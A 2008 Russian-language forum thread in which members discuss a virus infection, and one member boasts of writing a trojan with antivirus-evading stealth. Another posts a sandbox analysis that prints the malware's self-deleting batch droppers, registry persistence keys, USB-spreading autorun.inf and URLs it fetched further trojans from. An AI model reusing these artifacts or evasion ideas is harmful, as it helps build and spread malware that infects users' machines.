Sidebar

Подцепил вирь - лечение невозможно! О_х

  • Раздел «Hard & Soft» — часть данного форума, поэтому следует руководствоваться в первую очередь [URL=http://cs-mapping.com.ua/forum/showthread.php?t=17042]Правилами Форума[/URL] при написании сообщений и создании тем. Помимо этого, есть особые пункты настоящего раздела.

    0. Для чего нужен настоящий раздел? Для обсуждения твёрдого и мягкого, железа и софта, аппаратных и программных продуктов и всего того, что с этим связано.

    1. Как можно корректнее называйте тему. Постарайтесь указать как можно больше информации в первом сообщении темы. Характер информации зависит от темы.

    2. Прежде чем создавать тему для обсуждения какой-либо игры, воспользуйтесь поиском. Вполне возможно, что такая тема уже есть. В таком случае, свои мысли нужно писать именно туда, а не плодить одинаковые темы. Дельные сообщения для поднятия старых тем не запрещены. Бесполезные же запрещены и в новых темах. Убедившись в отсутствии интересующей вас темы, смело создавайте свою.

    3. Описывая проблему, давайте как можно больше информации. На проблему «ничего не работает, чёрный экран» толковой помощи не будет. Укажите операционную систему, конфигурацию компьютера, версию программного обеспечения и прочие необходимы сведения. При возникновении разногласий с кем-либо из форумчан, используйте чёткие аргументы, а не «тупая программа и кривое железо». Этим вы всё равно ничего не докажете, а лишь упадёте в глазах оппонента. Разжигание холиваров не рекомендуется.

    4. [URL=http://cs-mapping.com.ua/forum/forumdisplay.php?f=52]Запрещается обсуждение взлома программ[/URL].

    4.2 В настоящем разделе действует особое правило «4.2». Запрещены сообщения, содержащие вызывающе неверную либо вызывающе неверно интерпретированную информацию, способную привести к развитию нездоровой дискуссии. Мы уважаем чужое мнение, но оставляем за собой право удалять сообщения, безаппеляционно сообщающие вызывающе неверные факты.

    Игнорирование правил приведёт к закрытию или удалению вашей темы или сообщений, а также может повлечь за собой наказание вплоть до бана.

Slux

CEO of CSM
Jun 20, 2006
5,774
38
А прямыми ручками можно даже предотвратить попадание в комп заразы типа "авторан". И далеко не только ее.
 

antoha.by

Критик
Jun 12, 2007
981
32
2 TwisteR:
Дай заценить!
2 Escape:
Спец проги по типу различных сканнеров и т.д.
Зараза считаеться только тогда, заразой когда она активна и функционерует. А зараза которая лежит на харде и греется в магнтиных лучах это дерьмо собачее.
ЗЫ: Вирус твистера заинтриговал.
 

TwisteR

Техническая поддержка
Jul 24, 2006
4,043
Собрать его сначала надо... Это долгострой, его многие ждут :agy: К сожалению, у меня пока что нет вдохновения его доделать хотя бы до стадии альфа-релиза. Так что пока он "лежит на харде и греется в магнтиных лучах" :)
 

TwisteR

Техническая поддержка
Jul 24, 2006
4,043
2 antoha.by:
Хм, я же знаю, что за код я пишу, не так ли? %) Печатать вслепую научился, писать работающий код не думая — пока нет.
 

XAN

From a different world
Feb 12, 2006
3,591
34
antoha.by said:
2 TwisteR:
Хм... тогда откуда такая увереность в его скрытности.
Я его тестировал. отправял на тест - ни каспер, ни НОД, ни аваст с авирой не палят.
 

TwisteR

Техническая поддержка
Jul 24, 2006
4,043
2 XAN:
Я тебе давал версию без stealth-примочек. Она палится человеком с моском+руками, но не палится антивирусами (т.к. по их мнению, прога не содержит подозрительного кода). По мере добавления таких фич, как невидимость в файловой системе и в процессах, троян начинает палиться всё большим и большим кол-вом антивирусов (зато человек такой трой не заметит). В этом и состоит искусство программирования вирусов — чтоб не палиться антивирусниками и для человека быть не заментым.

Я пока ещё юный падаван в этой области, да и навряд до джедая прокачаюсь, на винду то уже забил :)
 

w00t

New member
Mar 3, 2008
1,048
2 TwisteR:
на Линукс вобше вирусов нет?
476aec4d3457.gif
 

XAN

From a different world
Feb 12, 2006
3,591
34
Maximan said:
2 TwisteR:
на Линукс вобше вирусов нет?
476aec4d3457.gif
Как в том анекдоте - "Скачал ради интереса вирус для линукса, так там 10 страниц инструкция по установке..."
 

TwisteR

Техническая поддержка
Jul 24, 2006
4,043
2 Maximan:
Сама концепция Open Source делает написание вирусов очень геморным (много версий ядер ОС, различные комбинации системных утилит, а именно уязвимость в этих местах наиболее опасна и желательна для вируса) и малоэффективным (уязвимость быстро исправят, а вирус не способен навредить системе из за жёсткой системы разграничения привилегий). Так что действующих вирусов в *nix нет. А те, что были — представляют только исторический интерес.

250px-Morris_Worm.jpg
 

HoRRoR

...
Jan 5, 2006
4,596
7
0
обновил нод, вирь не палит сиравно.
/me терзают смутные сомнения...
 

HoRRoR

...
Jan 5, 2006
4,596
7
0
2 antoha.by:
не так всё просто:
1. третий нод нельзя вырубить, а если завершить процесс - запустится снова
2. нету там такого
3. удалил, толку нету
4. удалил, был тока один файл
5. а не подскажешь как?
 

LinuXoid

New member
May 2, 2008
181
29
0
0
Kiev
2 HoRRoR:
а ты службу нода останавливай а не процесс убивай))
31.10.2008 0:43:08 Фильтр HTTP файл http://cs-mapping.com.ua/forum/attachment.php?attachmentid=35562 вероятно модифицированный Win32/Statik приложение соединение прервано - изолирован -JUST-IMAGINE-\Admin Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Download Master\dmaster.exe.
На сайте нода не густо:
Win32/Statik This label is used to identify malware detected by our second-generation heuristics generically. It’s a proactive detection that denotes a member of one of a range of malware families. After further analysis, a speciic sample detection label may be updated to something more speciic.

2 antoha.by:
31.10.2008 0:34:05 Фильтр HTTP файл http://cs-mapping.com.ua/forum/attachment.php?attachmentid=35575 Win32/Perlovga.A вирус соединение прервано - изолирован -JUST-IMAGINE-\Admin Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Documents and Settings\Admin\Local Settings\Application Data\Google\Chrome\Application\chrome.exe.
на сайте нода нашел про твою вирусню в январьских отчетах
Win32/Perlovga
Perlovga is a very simple program that copies iles to the %windir% folder, where it makes copies of itself as
%windir%\xcopy.exe. It also tries to copy %windir%\autorun.inf to C:\autorun.inf and is sometimes called Trojan.
CopySelf. It may be reported as one component of a larger attack.

з.ы. ща выковыряем из карантина, поюзаем на виртуальных машинах)) а потом - в кучу их

[ADDED=LinuXoid]1225408101[/ADDED]
на виртуальной машине запустил вирус HoRRoR'а, ибо заинтриговал, стоит нод, на время запуска отключил
После включения нод обнаружил
31.10.2008 0:57:47 Фильтр HTTP файл http://massme.net/aHdhgVNahsKGhsd.jnMHdhJFuii вероятно модифицированный Win32/Statik приложение соединение прервано - изолирован -JUST-IMAGINE-\Admin Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\WINDOWS\explorer.exe.
других проявлений не нашел...
вообщем решила вирусня себя докачать [как и в случае с Win32/Alman.* (этим летом пришлось с ним столкнуться, качает себя, несколько троянов и еще чтот, правда его есть несколько модификаций)]
 
Last edited:

LinuXoid

New member
May 2, 2008
181
29
0
0
Kiev
2 Maximan:
это делается проще))
ниже есть такая вещь:
Temporarily disable Antivirus...
а вот с нодом 2.* версий проще службу остановить

[ADDED=LinuXoid]1225410372[/ADDED]
2 Maximan:
это делается проще))
ниже есть такая вещь:
Temporarily disable Antivirus...
а вот с нодом 2.* версий проще службу остановить

А вот с активностью я проглядел...
Дальше пошло больше:
в процессах обнаружился sysfolder.exe [C:\WINDOWS\system32], грузящий процессор скачками от 0 и до ~50%,

который попросился наружу [205.278.145.65:80], а файервол тут же отреагировал соответственно
После получения разрешения на доступ попросил доступ в доверенную зону (локалка)
нод с новыми обновлениями не видит файл как что-либо вредное :(

31.10.2008 1:25:51 Фильтр HTTP файл http://massme.net/disablers.exe

вероятно модифицированный Win32/Spy.Agent троянская программа соединение прервано - изолирован

-JUST-IMAGINE-\Admin Обнаружена угроза при попытке доступа в Интернет следующим приложением:

C:\WINDOWS\explorer.exe.
31.10.2008 1:25:51 Фильтр HTTP файл http://zonetech.info/skp6.exe

модифицированный Win32/Agent.GZG троянская программа соединение прервано - изолирован

-JUST-IMAGINE-\Admin Обнаружена угроза при попытке доступа в Интернет следующим приложением:

C:\WINDOWS\explorer.exe.
31.10.2008 1:25:51 Фильтр HTTP файл http://massme.net/del.pub

Win32/Packed.PEArmor.Gen приложение соединение прервано - изолирован -JUST-IMAGINE-\Admin

Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\WINDOWS\explorer.exe.
31.10.2008 1:25:51 Фильтр HTTP файл http://exchangetransfer.com/infi.a

Win32/VB.NOU троянская программа соединение прервано - изолирован -JUST-IMAGINE-\Admin

Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\WINDOWS\explorer.exe.


потом надоело с этим возится, убил процесс и все затихло

з.ы. вирус прописывается в автозагрузку в реестре
HKLM\Software\Microsoft\Windows\Current Version\Run
а здесь лежит файл конфигурации для него sysfolder.ini
C:\Documents and Settings\Admin\Local Settings\Temp
Немного позднее, после перезагрузки, обнаружил в C:\Documents and Settings\Admin\ файлы planet.exe (ничего

вразумительного, что это такое нод - [вероятно неизвестный NewHeur_PE вирус], авг - [Trojan horse

PSW.Generic6.ANEE]), infmgr.exe нод - [Win32/VB.NOU троянская программа], planet.bat вида
@echo off
:1
del /F "C:\Documents and Settings\Admin\planet.exe"
If exist "C:\Documents and Settings\Admin\planet.exe" Goto 1
Start C:\WINDOWS\system32\sysfolder.exe /B
del "C:\Documents and Settings\Admin\planet.bat"
и похожий infmgr.bat
@echo off
:1
del /F "C:\Documents and Settings\Admin\infmgr.exe"
If exist "C:\Documents and Settings\Admin\infmgr.exe" Goto 1
Start C:\WINDOWS\system32\infmgr.exe /B
del "C:\Documents and Settings\Admin\infmgr.bat"

Реестр:
HKEY_LOCAL_MACHINE\Software\Microsoft\Shared Tools\MSConfig\startupreg\planet
Param: command
Val: C:\WINDOWS\system32\sysfolder.exe
Param: HKEY
Val: HKLM
Param: inimapping
Val: 0
Param: item
Val: sysfolder
Param: key
Val: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
C:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1033\vmmgr.exe
Param: C:\Documents and Settings\Admin\planet.bat
Value: planet

Далее вирус копирует себя в
c:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1033\
(файл с

именем vmmgr.exe) и позднее на флешках создает аналогичный "прикол", добавляя autorun.inf, такого

содержания
[autorun]
open=RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1033\vmmgr.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
shell\open=Open
shell\open\command=RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1033\vmmgr.exe
shell\open\default=1
Что самое интересное, ни нод, ни авг на vmmgr.exe не ругаются :(
причем прямо удалить файлы не получится, ибо заняты процессом, хотя процессов с таким именем не обнаружил
Зато записи о нем в реестре нашел:
HKEY_USERS\S-1-5-21-1715567821-113007714-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache
Param: C:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1033\vmmgr.exe
Value: vmmgr
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{28ABC5C0-4FCB-11CF-AAX5-81CX1C635612}\
Param: StubPath
Val: C:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1033\vmmgr.exe

а здесь полный зверинец (160 кб, рар-архив) за исключением sysfolder.exe... по привычке удалил))

при втором заражении немного другие имена файлов идут... Но файл-распространитель остается тот же vmmgr.exe
 
Last edited:

HoRRoR

...
Jan 5, 2006
4,596
7
0
2 mcSnake:
блин, перезалейте с этого тупого хостинга!!! Я НИКАК скачать не могу!
:crying:

[ADDED=HoRRoR]1225457884[/ADDED]
2 mcSnake:
у меня авторан на флешку всё равно что-то записывает, хоть я твоей лекалкой удалял, хоть ручками. А антивир ненашёл ничего

[ADDED=HoRRoR]1225458445[/ADDED]
http://virscan.net/report/49e0f508a35c98e61783a054bc1686c8.html
скинул туда планет.ехе

ни сумантек ни каспер не палят. нод аналагично
блин, как бы определить точное название вируса
 
Last edited:

Game Server

CSM TV

Page QR Code

QR Code

Donate Campaign

Total amount
$0.00
Goal
$25.00

Latest profile posts

TestUser wrote on TRUP@C's profile.
Master?
TestUser wrote on TRUP@C's profile.
Hello Father

Members online

No members online now.

Discord